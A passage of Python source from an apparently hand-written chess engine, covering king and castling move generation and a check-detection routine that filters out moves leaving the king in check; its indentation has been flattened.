if self.black_king_inf[0][0] + 1 > 7:
for move in move_list:
if move[5] == "E" or move[6] == "E":
king_moves[move] = False
if self.black_king_inf[0][1] + 1 > 7:
for move in move_list:
if move[5] == "N":
king_moves[move] = False
for i in range(0, len(self.black_occupation_x)):
if self.black_king_inf[0][0] == self.black_occupation_x[i] and self.black_king_inf[0][1] + 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "_":
king_moves[move] = False
elif self.black_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] + 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "E":
king_moves[move] = False
elif self.black_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "E" and move[6] == "_":
king_moves[move] = False
elif self.black_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] - 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "E":
king_moves[move] = False
elif self.black_king_inf[0][0] == self.black_occupation_x[i] and self.black_king_inf[0][1] - 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "_":
king_moves[move] = False
elif self.black_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] - 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "W":
king_moves[move] = False
elif self.black_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "W" and move[6] == "_":
king_moves[move] = False
elif self.black_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] + 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "W":
king_moves[move] = False
for move in move_list:
if king_moves[move] == True:
if move[5] == "N" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0], self.black_king_inf[0][1] + 1))
elif move[5] == "N" and move[6] == "E":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] + 1, self.black_king_inf[0][1] + 1))
elif move[5] == "E" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] + 1, self.black_king_inf[0][1]))
elif move[5] == "S" and move[6] == "E":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] + 1, self.black_king_inf[0][1] - 1))
elif move[5] == "S" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0], self.black_king_inf[0][1] - 1))
elif move[5] == "S" and move[6] == "W":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] - 1, self.black_king_inf[0][1] - 1))
elif move[5] == "W" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] - 1, self.black_king_inf[0][1]))
elif move[5] == "N" and move[6] == "W":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] - 1, self.black_king_inf[0][1] + 1))
if self.black_king_inf[0][2] == True and self.black_king_inf[0][3] == True:
move_list = ["O-O", "O-O-O"]
king_moves = {
"O-O" : True,
"O-O-O" : True,
}
for i in range(0, len(self.white_occupation_x)):
if self.black_king_inf[0][0] + 2 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O"] = False
elif self.black_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O"] = False
if self.black_king_inf[0][0] - 3 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.black_king_inf[0][0] - 2 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.black_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
for i in range(0, len(self.black_occupation_x)):
if self.black_king_inf[0][0] + 2 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O"] = False
elif self.black_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O"] = False
if self.black_king_inf[0][0] - 3 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.black_king_inf[0][0] - 2 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.black_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
for i in range(0, 2):
if self.black_rooks_inf[i][2] == False or self.black_rooks_inf[i][3] == False:
if i == 0:
king_moves["O-O-O"] = False
elif i == 1:
king_moves["O-O"] = False
for move in move_list:
if king_moves[move] == True:
self.legal_moves.append(move)
#print(self.legal_moves)
self.legal_moves_move_notation = self.legal_moves
def check_checks(self):
moves = deepcopy(self.legal_moves)
white_short_castle_through_check_check = False
white_long_castle_through_check_check = False
black_short_castle_through_check_check = False
black_long_castle_through_check_check = False
for move in moves:
white_pawns = deepcopy(self.white_pawns_inf)
white_bishops = deepcopy(self.white_bishops_inf)
white_knights = deepcopy(self.white_knights_inf)
white_rooks = deepcopy(self.white_rooks_inf)
white_queens = deepcopy(self.white_queens_inf)
white_king = deepcopy(self.white_king_inf)
black_pawns = deepcopy(self.black_pawns_inf)
black_bishops = deepcopy(self.black_bishops_inf)
black_knights = deepcopy(self.black_knights_inf)
black_rooks = deepcopy(self.black_rooks_inf)
black_queens = deepcopy(self.black_queens_inf)
black_king = deepcopy(self.black_king_inf)
#en_passant_xy = deepcopy(self.en_passant_x_y)
#white_occ_x = deepcopy(self.white_occupation_x)
#white_occ_y = deepcopy(self.white_occupation_y)
#black_occ_x = deepcopy(self.black_occupation_x)
#black_occ_y = deepcopy(self.black_occupation_y)
notation_val, take = self.convert_to_easy_notation(move)
if notation_val == "Ke1f1" and startup.white_turn == True:
white_short_castle_through_check_check = True
if notation_val == "Ke1d1" and startup.white_turn == True:
white_long_castle_through_check_check = True
if notation_val == "Ke8f8" and startup.white_turn == False:
black_short_castle_through_check_check = True
if notation_val == "Ke8d8" and startup.white_turn == False:
black_long_castle_through_check_check = True
if notation_val[0] == "B":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if white_bishops[i][2] == True and white_bishops[i][0] == fromx and white_bishops[i][1] == fromy:
white_bishops[i][0] = tox
white_bishops[i][1] = toy
else:
for i in range(0, 10):
if black_bishops[i][2] == True and black_bishops[i][0] == fromx and black_bishops[i][1] == fromy:
black_bishops[i][0] = tox
black_bishops[i][1] = toy
elif notation_val[0] == "N":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if white_knights[i][2] == True and white_knights[i][0] == fromx and white_knights[i][1] == fromy:
white_knights[i][0] = tox
white_knights[i][1] = toy
else:
for i in range(0, 10):
if black_knights[i][2] == True and black_knights[i][0] == fromx and black_knights[i][1] == fromy:
black_knights[i][0] = tox
black_knights[i][1] = toy
elif notation_val[0] == "R":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if white_rooks[i][2] == True and white_rooks[i][0] == fromx and white_rooks[i][1] == fromy:
white_rooks[i][0] = tox
white_rooks[i][1] = toy
white_rooks[i][3] = False
else:
for i in range(0, 10):
if black_rooks[i][2] == True and black_rooks[i][0] == fromx and black_rooks[i][1] == fromy:
black_rooks[i][0] = tox
black_rooks[i][1] = toy
black_rooks[i][3] = False
elif notation_val[0] == "Q":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 9):
if white_queens[i][2] == True and white_queens[i][0] == fromx and white_queens[i][1] == fromy:
white_queens[i][0] = tox
white_queens[i][1] = toy
else:
for i in range(0, 9):
if black_queens[i][2] == True and black_queens[i][0] == fromx and black_queens[i][1] == fromy:
black_queens[i][0] = tox
black_queens[i][1] = toy
elif notation_val[0] == "K":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
if white_king[0][2] == True and white_king[0][0] == fromx and white_king[0][1] == fromy:
white_king[0][0] = tox
white_king[0][1] = toy
white_king[0][3] = False
else:
if black_king[0][2] == True and black_king[0][0] == fromx and black_king[0][1] == fromy:
black_king[0][0] = tox
black_king[0][1] = toy
black_king[0][3] = False
elif notation_val[0] == "O":
if startup.white_turn == True:
white_king[0][3] = False
if notation_val == "O-O":
white_rooks[1][3] = False
white_king[0][0] = 6
white_king[0][1] = 0
for i in range(0, 2):
if white_rooks[i][0] == 7:
white_rooks[i][0] = 5
white_rooks[i][1] = 0
elif notation_val == "O-O-O":
white_rooks[0][3] = False
white_king[0][0] = 2
white_king[0][1] = 0
for i in range(0, 2):
if white_rooks[i][0] == 0:
white_rooks[i][0] = 3
white_rooks[i][1] = 0
else:
black_king[0][3] = False
if notation_val == "O-O":
black_rooks[1][3] = False
black_king[0][0] = 6
black_king[0][1] = 7
for i in range(0, 2):
if black_rooks[i][0] == 7:
black_rooks[i][0] = 5
black_rooks[i][1] = 7
elif notation_val == "O-O-O":
black_rooks[0][3] = False
black_king[0][0] = 2
black_king[0][1] = 7
for i in range(0, 2):
if black_rooks[i][0] == 0:
black_rooks[i][0] = 3
black_rooks[i][1] = 7
else:
if True:
if notation_val[-2] == "=":
tox = notation.get_column_char(notation_val[-4])
toy = int(notation_val[-3]) - 1
else:
tox = notation.get_column_char(notation_val[-2])
toy = int(notation_val[-1]) - 1
if take == True:
if notation_val[-2] == "=":
fromx = notation.get_column_char(notation_val[-5])
else:
fromx = notation.get_column_char(notation_val[-3])
if startup.white_turn == True:
fromy = toy - 1
else:
fromy = toy + 1
else:
fromx = tox
if startup.white_turn == True:
if toy == 3:
fromy = toy - 2
for i in range(0, 8):
if white_pawns[i][2] == True and white_pawns[i][0] == fromx and white_pawns[i][1] == toy - 1:
fromy = toy - 1
else:
fromy = toy - 1
else:
if toy == 4:
fromy = toy + 2
for i in range(0, 8):
if black_pawns[i][2] == True and black_pawns[i][0] == fromx and black_pawns[i][1] == toy + 1:
fromy = toy + 1
else:
fromy = toy + 1
if startup.white_turn == True:
for i in range(0, 8):
if white_pawns[i][2] == True and white_pawns[i][0] == fromx and white_pawns[i][1] == fromy:
if toy == 7:
white_pawns[i][2] = False
if notation_val[-1] == "Q":
promotion_complete = False
for i in range(1, 9):
if white_queens[i][2] == False and promotion_complete == False:
promotion_complete = True
white_queens[i][0] = tox
white_queens[i][1] = toy
white_queens[i][2] = True
elif notation_val[-1] == "R":
promotion_complete = False
for i in range(2, 10):
if white_rooks[i][2] == False and promotion_complete == False:
promotion_complete = True
white_rooks[i][0] = tox
white_rooks[i][1] = toy
white_rooks[i][2] = True
white_rooks[i][3] = False
elif notation_val[-1] == "B":
promotion_complete = False
for i in range(2, 10):
if white_bishops[i][2] == False and promotion_complete == False:
promotion_complete = True
white_bishops[i][0] = tox
white_bishops[i][1] = toy
white_bishops[i][2] = True
elif notation_val[-1] == "N":
promotion_complete = False
for i in range(2, 10):
if white_knights[i][2] == False and promotion_complete == False:
promotion_complete = True
white_knights[i][0] = tox
white_knights[i][1] = toy
white_knights[i][2] = True
else:
white_pawns[i][0] = tox
white_pawns[i][1] = toy
white_pawns[i][3] = False
else:
for i in range(0, 8):
if black_pawns[i][2] == True and black_pawns[i][0] == fromx and black_pawns[i][1] == fromy:
if toy == 0:
black_pawns[i][2] = False
if notation_val[-1] == "Q":
promotion_complete = False
for i in range(1, 9):
if black_queens[i][2] == False and promotion_complete == False:
promotion_complete = True
black_queens[i][0] = tox
black_queens[i][1] = toy
black_queens[i][2] = True
elif notation_val[-1] == "R":
promotion_complete = False
for i in range(2, 10):
if black_rooks[i][2] == False and promotion_complete == False:
promotion_complete = True
black_rooks[i][0] = tox
black_rooks[i][1] = toy
black_rooks[i][2] = True
black_rooks[i][3] = False
elif notation_val[-1] == "B":
promotion_complete = False
for i in range(2, 10):
if black_bishops[i][2] == False and promotion_complete == False:
promotion_complete = True
black_bishops[i][0] = tox
black_bishops[i][1] = toy
black_bishops[i][2] = True
elif notation_val[-1] == "N":
promotion_complete = False
for i in range(2, 10):
if black_knights[i][2] == False and promotion_complete == False:
promotion_complete = True
black_knights[i][0] = tox
black_knights[i][1] = toy
black_knights[i][2] = True
else:
black_pawns[i][0] = tox
black_pawns[i][1] = toy
black_pawns[i][3] = False
if take == True:
piece_taken = False
if startup.white_turn == True:
for i in range(0, 8):
if black_pawns[i][2] == True and black_pawns[i][0] == tox and black_pawns[i][1] == toy:
black_pawns[i][2] = False
piece_taken = True
for i in range(0, 10):
if black_bishops[i][2] == True and black_bishops[i][0] == tox and black_bishops[i][1] == toy:
black_bishops[i][2] = False
piece_taken = True
for i in range(0, 10):
if black_knights[i][2] == True and black_knights[i][0] == tox and black_knights[i][1] == toy:
black_knights[i][2] = False
piece_taken = True
for i in range(0, 10):
if black_rooks[i][2] == True and black_rooks[i][0] == tox and black_rooks[i][1] == toy:
black_rooks[i][2] = False
piece_taken = True
for i in range(0, 9):
if black_queens[i][2] == True and black_queens[i][0] == tox and black_queens[i][1] == toy:
black_queens[i][2] = False
piece_taken = True
if piece_taken == False:
for i in range(0, 8):
if black_pawns[i][2] == True and black_pawns[i][0] == tox and black_pawns[i][1] == toy - 1:
black_pawns[i][2] = False
else:
for i in range(0, 8):
if white_pawns[i][2] == True and white_pawns[i][0] == tox and white_pawns[i][1] == toy:
white_pawns[i][2] = False
piece_taken = True
for i in range(0, 10):
if white_bishops[i][2] == True and white_bishops[i][0] == tox and white_bishops[i][1] == toy:
white_bishops[i][2] = False
piece_taken = True
for i in range(0, 10):
if white_knights[i][2] == True and white_knights[i][0] == tox and white_knights[i][1] == toy:
white_knights[i][2] = False
piece_taken = True
for i in range(0, 10):
if white_rooks[i][2] == True and white_rooks[i][0] == tox and white_rooks[i][1] == toy:
white_rooks[i][2] = False
piece_taken = True
for i in range(0, 9):
if white_queens[i][2] == True and white_queens[i][0] == tox and white_queens[i][1] == toy:
white_queens[i][2] = False
piece_taken = True
if piece_taken == False:
for i in range(0, 8):
if white_pawns[i][2] == True and white_pawns[i][0] == tox and white_pawns[i][1] == toy + 1:
white_pawns[i][2] = False
white_occ_x = []
white_occ_y = []
black_occ_x = []
black_occ_y = []
for i in range(0, 8):
if white_pawns[i][2] == True:
white_occ_x.append(white_pawns[i][0])
white_occ_y.append(white_pawns[i][1])
for i in range(0, 10):
if white_knights[i][2] == True:
white_occ_x.append(white_knights[i][0])
white_occ_y.append(white_knights[i][1])
for i in range(0, 10):
if white_bishops[i][2] == True:
white_occ_x.append(white_bishops[i][0])
white_occ_y.append(white_bishops[i][1])
for i in range(0, 10):
if white_rooks[i][2] == True:
white_occ_x.append(white_rooks[i][0])
white_occ_y.append(white_rooks[i][1])
for i in range(0, 9):
if white_queens[i][2] == True:
white_occ_x.append(white_queens[i][0])
white_occ_y.append(white_queens[i][1])
if white_king[0][2] == True:
white_occ_x.append(white_king[0][0])
white_occ_y.append(white_king[0][1])
for i in range(0, 8):
if black_pawns[i][2] == True:
black_occ_x.append(black_pawns[i][0])
black_occ_y.append(black_pawns[i][1])
for i in range(0, 10):
if black_knights[i][2] == True:
black_occ_x.append(black_knights[i][0])
black_occ_y.append(black_knights[i][1])
for i in range(0, 10):
if black_bishops[i][2] == True:
black_occ_x.append(black_bishops[i][0])
black_occ_y.append(black_bishops[i][1])
for i in range(0, 10):
if black_rooks[i][2] == True:
black_occ_x.append(black_rooks[i][0])
black_occ_y.append(black_rooks[i][1])
for i in range(0, 9):
if black_queens[i][2] == True:
black_occ_x.append(black_queens[i][0])
black_occ_y.append(black_queens[i][1])
if black_king[0][2] == True:
black_occ_x.append(black_king[0][0])
black_occ_y.append(black_king[0][1])
if startup.white_turn == True:
for i in range(0, 8):
if white_king[0][0] + 1 == black_pawns[i][0] and white_king[0][1] + 1 == black_pawns[i][1] and black_pawns[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 1 == black_pawns[i][0] and white_king[0][1] + 1 == black_pawns[i][1] and black_pawns[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
if white_king[0][0] + 1 == black_knights[i][0] and white_king[0][1] + 2 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] + 2 == black_knights[i][0] and white_king[0][1] + 1 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] + 2 == black_knights[i][0] and white_king[0][1] - 1 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] + 1 == black_knights[i][0] and white_king[0][1] - 2 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 1 == black_knights[i][0] and white_king[0][1] - 2 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 2 == black_knights[i][0] and white_king[0][1] - 1 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 2 == black_knights[i][0] and white_king[0][1] + 1 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 1 == black_knights[i][0] and white_king[0][1] + 2 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
remove = True
if black_bishops[i][2] == True and abs(black_bishops[i][0] - white_king[0][0]) == abs(black_bishops[i][1] - white_king[0][1]):
if black_bishops[i][0] > white_king[0][0]:
if black_bishops[i][1] > white_king[0][1]:
for j in range(1, abs(black_bishops[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_bishops[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1] - j:
remove = False
else:
if black_bishops[i][1] > white_king[0][1]:
for j in range(1, abs(black_bishops[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_bishops[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
remove = True
if black_rooks[i][2] == True:
if black_rooks[i][0] == white_king[0][0]:
if black_rooks[i][1] > white_king[0][1]:
for j in range(1, abs(black_rooks[i][1] - white_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_rooks[i][1] - white_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] and black_occ_y[k] == white_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
elif black_rooks[i][1] == white_king[0][1]:
if black_rooks[i][0] > white_king[0][0]:
for j in range(1, abs(black_rooks[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1]:
remove = False
else:
for j in range(1, abs(black_rooks[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1]:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 9):
remove = True
if black_queens[i][2] == True and abs(black_queens[i][0] - white_king[0][0]) == abs(black_queens[i][1] - white_king[0][1]):
if black_queens[i][0] > white_king[0][0]:
if black_queens[i][1] > white_king[0][1]:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1] - j:
remove = False
else:
if black_queens[i][1] > white_king[0][1]:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
remove = True
if black_queens[i][2] == True:
if black_queens[i][0] == white_king[0][0]:
if black_queens[i][1] > white_king[0][1]:
for j in range(1, abs(black_queens[i][1] - white_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_queens[i][1] - white_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] and black_occ_y[k] == white_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
elif black_queens[i][1] == white_king[0][1]:
if black_queens[i][0] > white_king[0][0]:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1]:
remove = False
else:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1]:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
if abs(black_king[0][0] - white_king[0][0]) <= 1 and abs(black_king[0][1] - white_king[0][1]) <= 1:
if move in self.legal_moves:
self.legal_moves.remove(move)
else:
for i in range(0, 8):
if black_king[0][0] + 1 == white_pawns[i][0] and black_king[0][1] - 1 == white_pawns[i][1] and white_pawns[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 1 == white_pawns[i][0] and black_king[0][1] - 1 == white_pawns[i][1] and white_pawns[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
if black_king[0][0] + 1 == white_knights[i][0] and black_king[0][1] + 2 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] + 2 == white_knights[i][0] and black_king[0][1] + 1 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] + 2 == white_knights[i][0] and black_king[0][1] - 1 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] + 1 == white_knights[i][0] and black_king[0][1] - 2 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 1 == white_knights[i][0] and black_king[0][1] - 2 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 2 == white_knights[i][0] and black_king[0][1] - 1 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 2 == white_knights[i][0] and black_king[0][1] + 1 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif black_king[0][0] - 1 == white_knights[i][0] and black_king[0][1] + 2 == white_knights[i][1] and white_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
remove = True
if white_bishops[i][2] == True and abs(white_bishops[i][0] - black_king[0][0]) == abs(white_bishops[i][1] - black_king[0][1]):
if white_bishops[i][0] > black_king[0][0]:
if white_bishops[i][1] > black_king[0][1]:
for j in range(1, abs(white_bishops[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_bishops[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1] - j:
remove = False
else:
if white_bishops[i][1] > black_king[0][1]:
for j in range(1, abs(white_bishops[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_bishops[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
remove = True
if white_rooks[i][2] == True:
if white_rooks[i][0] == black_king[0][0]:
if white_rooks[i][1] > black_king[0][1]:
for j in range(1, abs(white_rooks[i][1] - black_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_rooks[i][1] - black_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] and black_occ_y[k] == black_king[0][1] - j:
